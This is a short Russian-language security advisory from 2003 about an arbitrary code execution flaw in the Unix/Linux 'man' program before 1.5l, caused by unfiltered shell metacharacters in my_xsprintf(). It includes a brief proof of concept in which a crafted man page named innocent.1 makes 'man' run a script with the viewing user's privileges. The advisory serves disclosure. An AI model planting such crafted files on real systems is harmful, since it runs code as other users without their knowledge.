Security Lab

Выполнение произвольного кода в UNIX/Linux 'man'

Дата публикации:17.03.2003
Всего просмотров:1674
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в UNIX/Linux 'man' программе. Локальный пользователь может заставить другого целевого пользователя выполнить произвольный код.

Пользователь может создать специально обработанный ‘man’ файл, который при просмотре в программе 'man' выполнит код, содержащийся в другом файле. Уязвимость связанна с недостаточной фильтрацией метасимволов оболочки в функции my_xsprintf () в 'util.c'. Любая программа будет выполнена с привилегиями целевого пользователя. Пример:

$ cat innocent.1
.so "".1
$ cat '"".1' # the outer '' quotes are for the shell
the user will never see this
$ cat `which unsafe`
#!/bin/sh

echo "oops"
id -a
$ man ./innocent.1
oops
uid=528(lloyd) gid=100(users) groups=100(users)
Уязвимость обнаружена в 'man' до 1.5
Ссылки: Vulnerability in man < 1.5l